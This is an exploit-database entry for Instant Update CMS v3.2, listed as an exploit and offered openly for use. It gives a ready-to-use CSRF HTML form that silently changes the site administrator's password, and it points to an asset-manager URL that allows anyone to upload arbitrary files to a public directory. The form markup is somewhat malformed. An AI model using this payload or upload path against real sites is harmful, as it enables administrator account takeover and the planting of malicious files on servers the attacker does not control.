Instant Update CMS v3.2 Arbitrary File Upload/CSRF Vulnerabilties

2012-06-01T00:00:00
ID 1337DAY-ID-18408
Type zdt
Reporter AtT4CKxT3rR0r1ST
Modified 2012-06-01T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Instant Update CMS v3.2  Arbitrary File Upload/CSRF Vulnerabilties
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.cubescripts.com/cms-script.php

#######################################################################

===[ Exploit ]===


CSRF [Change Password Admin]
=============================

<form method="POST" name="form1" action="http://SITE/manage/savechngdpasswd.php">
<input type="hidden" name="pass1" value="password"/>
<input type="hidden" name="pass2" value="Password"/>
<input type="hidden" name="image.x" value="33"/>
<input type="hidden" name="image.y" value="11"/>
<input type="hidden" name="image" value="edit"/>
</form>

</body>
</html>


Remote Arbitrary File Upload
================================


http://SITE/manage/scripts/assetmanager/assetmanager.php?ffilter=media

Your File

http://SITE/UserFiles/

#######################################################################



#  0day.today [2016-04-19]  #